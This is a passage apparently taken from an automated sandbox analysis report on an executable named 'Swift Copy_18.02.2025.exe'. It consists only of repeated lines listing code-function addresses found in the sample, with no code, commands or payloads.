Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7D218	6_2_38E7D218
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7E7CF	6_2_38E7E7CF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7E7D0	6_2_38E7E7D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E71F98	6_2_38E71F98
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7E377	6_2_38E7E377
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7E378	6_2_38E7E378
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7DF20	6_2_38E7DF20
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E70B20	6_2_38E70B20
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E70B30	6_2_38E70B30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7DF11	6_2_38E7DF11
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390681D0	6_2_390681D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906FC18	6_2_3906FC18
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906B318	6_2_3906B318
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39067B78	6_2_39067B78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39068FB0	6_2_39068FB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906A928	6_2_3906A928
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906A938	6_2_3906A938
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906E538	6_2_3906E538
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906C548	6_2_3906C548
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906E548	6_2_3906E548
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39060D48	6_2_39060D48
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906C558	6_2_3906C558
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906119F	6_2_3906119F
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390611A0	6_2_390611A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906E9C8	6_2_3906E9C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906C9D8	6_2_3906C9D8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906E9D8	6_2_3906E9D8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390615E8	6_2_390615E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906C9E8	6_2_3906C9E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390615F8	6_2_390615F8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906DC19	6_2_3906DC19
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066021	6_2_39066021
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906BC2A	6_2_3906BC2A
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906DC28	6_2_3906DC28
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066030	6_2_39066030
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906BC38	6_2_3906BC38
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39060040	6_2_39060040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39063450	6_2_39063450
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39063460	6_2_39063460
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066478	6_2_39066478
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066488	6_2_39066488
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39060498	6_2_39060498
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906E0A7	6_2_3906E0A7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906C0B7	6_2_3906C0B7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906E0B8	6_2_3906E0B8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390638B8	6_2_390638B8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906C0C8	6_2_3906C0C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390608F0	6_2_390608F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906B307	6_2_3906B307
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39062300	6_2_39062300
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906D308	6_2_3906D308
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39067722	6_2_39067722
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39067720	6_2_39067720
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39065328	6_2_39065328
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39062748	6_2_39062748
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39062758	6_2_39062758
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39067B69	6_2_39067B69
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39065770	6_2_39065770
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906F778	6_2_3906F778
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906D787	6_2_3906D787
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39065780	6_2_39065780
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906F788	6_2_3906F788
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906B798	6_2_3906B798
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906D798	6_2_3906D798
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39062BA0	6_2_39062BA0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39068FA1	6_2_39068FA1
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906B7A8	6_2_3906B7A8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39062BB0	6_2_39062BB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39065BD8	6_2_39065BD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066A07	6_2_39066A07
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066A18	6_2_39066A18
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39064622	6_2_39064622
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39064620	6_2_39064620
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39061A4F	6_2_39061A4F
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906EE57	6_2_3906EE57
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39061A50	6_2_39061A50
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906CE67	6_2_3906CE67
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906EE68	6_2_3906EE68
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066E72	6_2_39066E72
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39066E70	6_2_39066E70
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906CE78	6_2_3906CE78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39064A78	6_2_39064A78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39061E98	6_2_39061E98
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39061EA8	6_2_39061EA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39064EC0	6_2_39064EC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390672CA	6_2_390672CA
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390672C8	6_2_390672C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39064ED0	6_2_39064ED0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906F2E7	6_2_3906F2E7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906D2F7	6_2_3906D2F7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390622F0	6_2_390622F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3906F2F8	6_2_3906F2F8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D6B40	6_2_390D6B40
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D6678	6_2_390D6678
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D5FD8	6_2_390D5FD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D4908	6_2_390D4908
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D7008	6_2_390D7008
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DC608	6_2_390DC608
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D2907	6_2_390D2907
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D0006	6_2_390D0006
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DDE00	6_2_390DDE00
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DAE1F	6_2_390DAE1F
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D5219	6_2_390D5219
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D2918	6_2_390D2918
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DC618	6_2_390DC618
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D8318	6_2_390D8318
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DF111	6_2_390DF111
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1710	6_2_390D1710
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9B10	6_2_390D9B10
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D5228	6_2_390D5228
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D8328	6_2_390D8328
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D322A	6_2_390D322A
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DD927	6_2_390DD927
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DF120	6_2_390DF120
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D5B39	6_2_390D5B39
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D3238	6_2_390D3238
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DD938	6_2_390DD938
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9637	6_2_390D9637
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DAE30	6_2_390DAE30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D6B30	6_2_390D6B30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D5B48	6_2_390D5B48
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9648	6_2_390D9648
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D3B4A	6_2_390D3B4A
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DEC4A	6_2_390DEC4A
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D0040	6_2_390D0040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DC142	6_2_390DC142
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D3B58	6_2_390D3B58
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DEC58	6_2_390DEC58
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DA958	6_2_390DA958
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DC150	6_2_390DC150
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D0950	6_2_390D0950
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D7E50	6_2_390D7E50
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DA968	6_2_390DA968
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D4468	6_2_390D4468
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D6568	6_2_390D6568
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D0960	6_2_390D0960
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D7E60	6_2_390D7E60
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DD460	6_2_390DD460
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DE77F	6_2_390DE77F
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D4478	6_2_390D4478
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D2478	6_2_390D2478
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DBC78	6_2_390DBC78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9171	6_2_390D9171
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DD470	6_2_390DD470
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1270	6_2_390D1270
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DA48F	6_2_390DA48F
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D4D89	6_2_390D4D89
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D2488	6_2_390D2488
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DBC88	6_2_390DBC88
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D7988	6_2_390D7988
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1280	6_2_390D1280
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9180	6_2_390D9180
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D4D98	6_2_390D4D98
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D7998	6_2_390D7998
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D2D9A	6_2_390D2D9A
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1B91	6_2_390D1B91
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DE790	6_2_390DE790
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DB7AF	6_2_390DB7AF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D8CA9	6_2_390D8CA9
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D2DA8	6_2_390D2DA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DCFA8	6_2_390DCFA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D56A8	6_2_390D56A8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DCFA6	6_2_390DCFA6
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1BA0	6_2_390D1BA0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DA4A0	6_2_390DA4A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DFAA0	6_2_390DFAA0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D74BF	6_2_390D74BF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D56B8	6_2_390D56B8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D8CB8	6_2_390D8CB8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DE2B8	6_2_390DE2B8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D36B7	6_2_390D36B7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DFAB0	6_2_390DFAB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D36C8	6_2_390D36C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DE2C8	6_2_390DE2C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9FC8	6_2_390D9FC8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D5FC7	6_2_390D5FC7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DB7C0	6_2_390DB7C0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D04C0	6_2_390D04C0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9FD8	6_2_390D9FD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D3FD8	6_2_390D3FD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DF5D7	6_2_390DF5D7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DCAD1	6_2_390DCAD1
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D04D0	6_2_390D04D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D74D0	6_2_390D74D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D3FE8	6_2_390D3FE8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DF5E8	6_2_390DF5E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1FE8	6_2_390D1FE8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DB2E8	6_2_390DB2E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DCAE0	6_2_390DCAE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D0DE0	6_2_390D0DE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D87E0	6_2_390D87E0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D16FF	6_2_390D16FF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D9AFF	6_2_390D9AFF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D1FF8	6_2_390D1FF8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DB2F8	6_2_390DB2F8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D6FFA	6_2_390D6FFA
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D48F7	6_2_390D48F7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D0DF0	6_2_390D0DF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390D87F0	6_2_390D87F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390DDDF0	6_2_390DDDF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F73E0	6_2_390F73E0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390FDA30	6_2_390FDA30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F4500	6_2_390F4500
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F1300	6_2_390F1300
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6120	6_2_390F6120
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F2F20	6_2_390F2F20
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F4B40	6_2_390F4B40
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F1940	6_2_390F1940
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0356	6_2_390F0356
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390FF168	6_2_390FF168
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6760	6_2_390F6760
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F3560	6_2_390F3560
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0360	6_2_390F0360
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F5180	6_2_390F5180
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F1F80	6_2_390F1F80
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6D90	6_2_390F6D90
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F3BA0	6_2_390F3BA0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F09A0	6_2_390F09A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6DA0	6_2_390F6DA0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F57C0	6_2_390F57C0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F25C0	6_2_390F25C0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F41E0	6_2_390F41E0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0FE0	6_2_390F0FE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F5E00	6_2_390F5E00
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F2C00	6_2_390F2C00
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F4820	6_2_390F4820
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F1620	6_2_390F1620
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6440	6_2_390F6440
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F3240	6_2_390F3240
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0040	6_2_390F0040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F4E60	6_2_390F4E60
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F1C60	6_2_390F1C60
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0670	6_2_390F0670
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6A70	6_2_390F6A70
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F6A80	6_2_390F6A80
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F3880	6_2_390F3880
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0680	6_2_390F0680
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390FF0A4	6_2_390FF0A4
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F54A0	6_2_390F54A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F22A0	6_2_390F22A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F70C0	6_2_390F70C0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F3EC0	6_2_390F3EC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F0CC0	6_2_390F0CC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F5AE0	6_2_390F5AE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F28E0	6_2_390F28E0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F12F0	6_2_390F12F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390F44F0	6_2_390F44F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910FB30	6_2_3910FB30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39108470	6_2_39108470
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39101CF0	6_2_39101CF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910AD10	6_2_3910AD10
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910DF10	6_2_3910DF10
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39100508	6_2_39100508
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910C930	6_2_3910C930
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39109730	6_2_39109730
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910E550	6_2_3910E550
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910B350	6_2_3910B350
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39101351	6_2_39101351
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39109D70	6_2_39109D70
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910CF70	6_2_3910CF70
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39101360	6_2_39101360
